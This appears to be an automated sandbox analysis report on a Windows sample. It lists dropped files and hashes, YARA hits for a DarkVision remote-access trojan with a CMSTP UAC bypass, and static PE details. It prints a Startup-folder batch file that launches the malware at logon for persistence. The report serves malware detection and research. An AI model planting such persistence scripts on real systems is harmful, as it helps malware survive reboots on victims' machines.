                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_btv4rj30.cwy.psm1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d2vcptwu.pqt.ps1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_daoswx14.acj.psm1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g2u45n10.1fe.psm1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ipowf3ju.zdc.psm1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lhjn1fzd.wub.ps1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o153wvgl.xe2.ps1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_otzmrymx.u0o.psm1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qte2ovak.his.psm1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zrsn1ony.zro.ps1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                          C:\Users\user\AppData\Local\Temp\asrjskwdsdoc.sys

                                                                                                          Download File
                                                                                                          Process:C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe
                                                                                                          File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):14544
                                                                                                          Entropy (8bit):6.2660301556221185
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                                                          MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                                                          SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                                                          SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                                                          SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 5%
                                                                                                          Joe Sandbox View:
                                                                                                          • Filename: IYXE4Uz61k.exe, Detection: malicious, Browse
                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                          • Filename: nlGOh9K5X5.exe, Detection: malicious, Browse
                                                                                                          • Filename: LfHJdrALlh.exe, Detection: malicious, Browse
                                                                                                          • Filename: iKvzvknzW1.exe, Detection: malicious, Browse
                                                                                                          • Filename: 2zirzlMVqX.bat, Detection: malicious, Browse
                                                                                                          • Filename: DM6vAAgoCw.exe, Detection: malicious, Browse
                                                                                                          • Filename: f5TWdT5EAc.exe, Detection: malicious, Browse
                                                                                                          • Filename: luQ2wBh8q6.exe, Detection: malicious, Browse
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

                                                                                                          C:\Users\user\AppData\Local\Temp\downloaded_file.bin

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):515600
                                                                                                          Entropy (8bit):7.99963177911539
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:12288:QdzOJGhg2nfH8n9/2FZjsOdj81w/U2CPYjqRXNOB:Q9OUO2fYCZY2GdYj4g
                                                                                                          MD5:8D7493DB663BD32F51A5CEA961029033
                                                                                                          SHA1:1DEB3CDCD775919484EC770C7AE0422BDD9C046E
                                                                                                          SHA-256:67B5F51094A8B094886BF57EFD576EDF76049D301525743A74B920F1E4E3F204
                                                                                                          SHA-512:2E56A1FBBFA4AC54B72415ABCF65FE912E89029E2058DBCD6C0B95511A7CBDFC155B859D262D5CD959B5C7027431F5E4CC441EB0ACA60E960959D3EFECC9E0CB
                                                                                                          Malicious:true
                                                                                                          Preview:.....QS.o..(.*..,&..5.[........1Y........!v6gk..P......_......Pc~..V._Q.(N..j.....i..r.x.{.fX.hy.\q2....&.i..:).e..+..{.g;...?.K..|6.. .5.........I.RG.[..6..v...:.E..)?......M..`.w....z.[f.C. ..?..o.,....x..k..O.1..6...A......gm..@...I..&...'..X.#X.p..../......F.uZ...dA3.W...Z*....o.B..S.9....Y.9...0@}.i..]<?..........;5*..|rL.......H..6....g.s&G./_..|(\-ys...a.(.F.Ou1....B9nW./a..I....5....~d..,..."_....~..:?M..7.g.r....@..._V...w4[\ZZ.k..k.@...3.K....6.........g..<.I..B...|3........M....k.{.............:.U<d1>...s3....w.O.X.\.O.n/.f&..D...:sm..y...66|8W.r.!.d............A.y0._.*..>.-..(.:/M.R......1.u.5...O.Dq.$...%.&.4/.......:....../,...e.....2a.......FDzN..9.[.^.........m}.e....f....~.....h.`H.'....o.m.|.>..V..1.....X.=......(u..z....I3Q....p......(.K...{...(..0ga0.;.......m..s..s......vQx .a....P`....b.k...j~Vm.C.0.b...........R....>H...VNL]`..P.V..K..-I..F...xt.....z.89}i( ..l..z.=.....Z(s....L{1..1zQ.O.....*Bb..s.$...

                                                                                                          C:\Users\user\AppData\Local\Temp\downloaded_file.exe

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):515584
                                                                                                          Entropy (8bit):6.2318905021613515
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:BRHP4vL3s5+CM6OW0nUBiwCCWfS34mbWMkRONOgbBpiEVBHl8ba2z7rkBiL:BRHP63srM6AbCWfS34mSMkrCpPFBE
                                                                                                          MD5:D60C9E070239F8C240AAA6D8832E11EF
                                                                                                          SHA1:AAAC23A338A91505C56C3057D22A14BF190A2795
                                                                                                          SHA-256:493F1BD7227C4EE9430F8AD226E929908996B97A28F578A850E9B26C393AD2D2
                                                                                                          SHA-512:D70CF79DEC352BD965F8506AD989375642A8931300D5497724C82882AE4D57CCC314D4E6B24C398075AF3DEB4433207522106647E70E74C90E56791E20BCA42C
                                                                                                          Malicious:true
                                                                                                          Yara Hits:
                                                                                                          • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe, Author: Joe Security
                                                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe, Author: ditekSHen
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                          • Antivirus: ReversingLabs, Detection: 83%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........W...9...9...9.......9..U....9......9......9...8.K.9..U....9..U....9..U....9..U....9..U....9.Rich..9.........................PE..L.....6g............................lb....... ....@..........................P............@....................................d................................/.....................................@............ ...............................text............................... ..`.rdata....... ......................@..@.data....4..........................@....rsrc...............................@..@.reloc...=.......>..................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AutoRun_WindosCPUsystem.bat

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\cmd.exe
                                                                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):73
                                                                                                          Entropy (8bit):4.746560909067808
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:mKDDFRKn9mbZkRE5ORWRAI0Eyn:hGEi4ORHnEyn
                                                                                                          MD5:1E0342A7A3BD059510E2A01423F8BAD2
                                                                                                          SHA1:3EB5C2B68A7C14A236826851F784567F94AF0003
                                                                                                          SHA-256:ADD6590578FCD418A8C47F5DE9E1D7688B76D9023D4F58B50076DE743F7319B4
                                                                                                          SHA-512:6DA334D45886354CEB1F8C4B622FC3B26021995DF4DA61DAD44F3E4E6F41C3D92FF5450877F8E8F09D83E1FA62A234D7F4AFC28B050077FB9002C4D81DAF5F65
                                                                                                          Malicious:true
                                                                                                          Preview:@echo off..start "" "C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe"..

                                                                                                          \Device\Null

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\timeout.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators, with overstriking
                                                                                                          Category:dropped
                                                                                                          Size (bytes):92
                                                                                                          Entropy (8bit):4.300553674183507
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:hYFEHgARcWmFsFJQZtctFst3g4t32vov:hYFE1mFSQZi3MXt3X
                                                                                                          MD5:F74899957624A2837F2F86E8E62E92D4
                                                                                                          SHA1:1FCDAC5DEC5B0B1E00CF0247DA2A5F18566F1431
                                                                                                          SHA-256:507992A303C447D1D40D36E2E5163A237077B94F23A7089AC90A2F08682AE9BC
                                                                                                          SHA-512:E3FD14728633614B6552A75C15079AC8B04C0E8B3F49535B522C73312B1C812E30A934099AB18B507A0B4878068987D5545E90FA3747F7E7B10360EE324DB435
                                                                                                          Malicious:false
                                                                                                          Preview:..Waiting for 10 seconds, press CTRL+C to quit ..... 9.. 8.. 7.. 6.. 5.. 4.. 3.. 2.. 1.. 0..

                                                                                                          Static File Info

                                                                                                          General

                                                                                                          File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                          Entropy (8bit):6.478803320046224
                                                                                                          TrID:
                                                                                                          • Win64 Executable GUI (202006/5) 92.64%
                                                                                                          • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                          • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                          • DOS Executable Generic (2002/1) 0.92%
                                                                                                          • VXD Driver (31/22) 0.01%
                                                                                                          File name:file.exe
                                                                                                          File size:124'416 bytes
                                                                                                          MD5:a3d68745e8919e2a48d8fa0738da124e
                                                                                                          SHA1:85ea6ab1d2d3f6af2011b130756d57f31539e171
                                                                                                          SHA256:65bc085f99db63b0581b2153a0aa2d7151133aafeeb2810f56a5d17ef9760d46
                                                                                                          SHA512:99575b08e17dd409e2cede4996bfc812ebe430a811f96b5c08e3093be8149e2aa148c4d7b71f1c24b5d2be592567494ea0118e355839fc83ab3603a34098a5ac
                                                                                                          SSDEEP:3072:a2sMWkzbJh1qZ9QW69hd1MMdxPe9N9uA0hu9TBfcXG2:7bJhs7QW69hd1MMdxPe9N9uA0hu9TBD2
                                                                                                          TLSH:DFC33966B2E01198DBB581F6D9921706EB7074361B15A3DB6BB853B31B2B4C68F3C3D0
                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....msZ........../....2.`.....................@.............................0.............................................

                                                                                                          File Icon

                                                                                                          Icon Hash:90cececece8e8eb0

                                                                                                          Static PE Info

                                                                                                          General

                                                                                                          Entrypoint:0x140001000
                                                                                                          Entrypoint Section:.code
                                                                                                          Digitally signed:false
                                                                                                          Imagebase:0x140000000
                                                                                                          Subsystem:windows gui
                                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE
                                                                                                          DLL Characteristics:
                                                                                                          Time Stamp:0x5A736DDC [Thu Feb 1 19:43:24 2018 UTC]
                                                                                                          TLS Callbacks:
                                                                                                          CLR (.Net) Version:
                                                                                                          OS Version Major:4
                                                                                                          OS Version Minor:0
                                                                                                          File Version Major:4
                                                                                                          File Version Minor:0
                                                                                                          Subsystem Version Major:4
                                                                                                          Subsystem Version Minor:0
                                                                                                          Import Hash:7182b1ea6f92adbf459a2c65d8d4dd9e

                                                                                                          Entrypoint Preview

                                                                                                          Instruction
                                                                                                          dec eax
                                                                                                          sub esp, 28h
                                                                                                          dec ecx
                                                                                                          mov eax, 00000160h
                                                                                                          dec eax
                                                                                                          xor edx, edx
                                                                                                          dec eax
                                                                                                          mov ecx, 40020444h
                                                                                                          add dword ptr [eax], eax
                                                                                                          add byte ptr [eax], al
                                                                                                          call 00007F3A187B2998h
                                                                                                          dec eax
                                                                                                          xor ecx, ecx
                                                                                                          call 00007F3A187B2996h
                                                                                                          dec eax
                                                                                                          mov dword ptr [0001F420h], eax
                                                                                                          dec ebp
                                                                                                          xor eax, eax
                                                                                                          dec eax
                                                                                                          mov edx, 00001000h
                                                                                                          dec eax
                                                                                                          xor ecx, ecx
                                                                                                          call 00007F3A187B2983h
                                                                                                          dec eax
                                                                                                          mov dword ptr [0001F3FFh], eax
                                                                                                          dec eax
                                                                                                          mov eax, 4001F088h
                                                                                                          add dword ptr [eax], eax
                                                                                                          add byte ptr [eax], al
                                                                                                          dec eax
                                                                                                          mov dword ptr [0001F43Eh], eax
                                                                                                          call 00007F3A187BD9BAh
                                                                                                          call 00007F3A187BD649h
                                                                                                          call 00007F3A187B9770h
                                                                                                          call 00007F3A187B8D63h
                                                                                                          call 00007F3A187B85F2h
                                                                                                          call 00007F3A187B82C1h
                                                                                                          call 00007F3A187B79B8h
                                                                                                          call 00007F3A187B6E6Fh
                                                                                                          call 00007F3A187B2A92h
                                                                                                          call 00007F3A187BB955h
                                                                                                          call 00007F3A187BA1B4h
                                                                                                          dec eax
                                                                                                          mov edx, 4001F02Ah
                                                                                                          add dword ptr [eax], eax
                                                                                                          add byte ptr [eax], al
                                                                                                          dec eax
                                                                                                          lea ecx, dword ptr [0001F3C6h]
                                                                                                          call 00007F3A187BD9E2h
                                                                                                          dec eax
                                                                                                          mov ecx, FFFFFFF5h

                                                                                                          Data Directories

                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x1f1980xc8.data
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x220000xc80.rsrc
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1d0000x10c8.pdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x1f6a80x448.data
                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                          Sections

                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                          .code0x10000x5a990x5c001d0c9527ee8a05d865534bbee542e47eFalse0.364937160326087data5.471300917234666IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                          .text0x70000x102c50x104006e20cd0789b9aa50422f27883fd5e9bcFalse0.4876201923076923data6.333951903059359IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                          .rdata0x180000x4b2d0x4c005adef60093ee71127f4e613fda5f050fFalse0.6623149671052632VAX-order 68k Blit mpx/mux executable6.662073317603483IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                          .pdata0x1d0000x10c80x1200415f7b43ac6a86ff843649544b818973False0.466796875data4.88380909718978IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                          .data0x1f0000x23180x16009591a60776db6831ff38026b5b3ff33eFalse0.32848011363636365data4.299370598184235IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                          .rsrc0x220000xc800xe0050cebeb29ad586af6894795db41edaa9False0.7698102678571429data7.255536006086562IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                          Resources

                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                          RT_RCDATA0x2221c0x7ccdata1.0055110220440882
                                                                                                          RT_RCDATA0x229e80x1very short file (no magic)9.0
                                                                                                          RT_RCDATA0x229ec0x1adata1.3461538461538463
                                                                                                          RT_RCDATA0x22a080xezlib compressed data1.5714285714285714
                                                                                                          RT_MANIFEST0x22a180x267XML 1.0 document, ASCII text0.5284552845528455

                                                                                                          Imports

                                                                                                          DLLImport
                                                                                                          msvcrt.dllmemset, wcsncmp, memmove, wcsncpy, wcsstr, _wcsnicmp, _wcsdup, free, _wcsicmp, wcslen, wcscpy, wcscmp, memcpy, tolower, wcscat, malloc
                                                                                                          KERNEL32.dllGetModuleHandleW, HeapCreate, GetStdHandle, HeapDestroy, ExitProcess, WriteFile, GetTempFileNameW, LoadLibraryExW, EnumResourceTypesW, FreeLibrary, RemoveDirectoryW, GetExitCodeProcess, EnumResourceNamesW, GetCommandLineW, LoadResource, SizeofResource, FreeResource, FindResourceW, GetShortPathNameW, GetSystemDirectoryW, EnterCriticalSection, CloseHandle, LeaveCriticalSection, InitializeCriticalSection, WaitForSingleObject, TerminateThread, CreateThread, Sleep, WideCharToMultiByte, HeapAlloc, HeapFree, LoadLibraryW, GetProcAddress, GetCurrentProcessId, GetCurrentThreadId, GetModuleFileNameW, GetEnvironmentVariableW, SetEnvironmentVariableW, GetCurrentProcess, TerminateProcess, RtlLookupFunctionEntry, RtlVirtualUnwind, RemoveVectoredExceptionHandler, AddVectoredExceptionHandler, HeapSize, MultiByteToWideChar, CreateDirectoryW, SetFileAttributesW, GetTempPathW, DeleteFileW, GetCurrentDirectoryW, SetCurrentDirectoryW, CreateFileW, SetFilePointer, TlsFree, TlsGetValue, TlsSetValue, TlsAlloc, HeapReAlloc, DeleteCriticalSection, GetLastError, SetLastError, UnregisterWait, GetCurrentThread, DuplicateHandle, RegisterWaitForSingleObject
                                                                                                          SHELL32.DLLShellExecuteExW, SHGetFolderLocation, SHGetPathFromIDListW
                                                                                                          WINMM.DLLtimeBeginPeriod
